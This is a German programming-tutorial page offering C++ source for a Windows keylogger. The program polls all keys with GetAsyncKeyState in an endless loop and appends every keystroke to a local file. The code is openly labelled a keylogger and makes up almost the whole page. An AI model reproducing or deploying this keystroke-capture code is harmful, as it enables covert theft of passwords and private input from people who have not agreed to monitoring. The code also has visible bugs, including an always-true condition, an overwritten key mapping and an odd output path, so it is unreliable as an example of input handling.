Navigation
Artikel
Stuff
RSS Feeds
|
Sourcecodes - Keylogger - Tastatur abfragenSprachenübersicht/C / C++/ C#/System Keywords: Keylogger, GetAsyncKeyState Mit der Funktion GetAsyncKeyState lässt sich die Tastatur einfach abfragen. Der folgende Code fragt alle wichtigen Tasten ab, und schreibt sie, wenn gedrückt, in eine Datei.
Code: #include <windows.h> #include <Winuser.h> #include <string.h> #include <fstream> //Testet ob ein Key abgefragt wurde std::string GetKey(int Key) { std::string KeyString = ""; if (Key == 8){ KeyString = "[delete]"; } if (Key == 13){ KeyString = "\n"; } if (Key == 32){ KeyString = " "; } if (Key == VK_PAUSE){ KeyString = "[PAUSE]"; } if (Key == VK_CAPITAL){ KeyString = "[CAPITAL]"; } if (Key == VK_SHIFT){ KeyString = "[SHIFT]"; } if (Key == VK_TAB){ KeyString = "[TABULATOR]"; } if (Key == VK_CONTROL){ KeyString = "[CTRL]"; } if (Key == VK_ESCAPE){ KeyString = "[ESCAPE]"; } if (Key == VK_END){ KeyString = "[END]"; } if (Key == VK_HOME){ KeyString = "[HOME]"; } if (Key == VK_LEFT){ KeyString = "[LEFT]"; } if (Key == VK_RIGHT){ KeyString = "[RIGHT]"; KeyString = "."; } //Char klein machen if (Key >=96 && Key <= 105){ KeyString = Key-48; } if (Key > 47 && Key < 60){ KeyString = Key; } if (Key != VK_LBUTTON || Key != VK_RBUTTON) { if (Key > 64 && Key < 91) { if (GetKeyState(VK_CAPITAL)) KeyString = Key; else { Key = Key + 32; KeyString = Key; } } } return KeyString; } int main() { std::string Filename = "\\c5\\Desktop"; std::string TempString = ""; std::fstream FStream; FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app); while(true) { //Verhindert CPU Auslastung 5ms sleep Sleep(5); for(int i = 8; i < 191; i++) { if(GetAsyncKeyState(i)&1 ==1) { TempString = GetKey (i); FStream.write(TempString.c_str(), TempString.size()); FStream.close(); FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app); } } } } Gibt es noch irgendwelche Fragen, oder wollen Sie über den Artikel diskutieren? Sprachenübersicht/C / C++/ C#/System/Keylogger - Tastatur abfragen |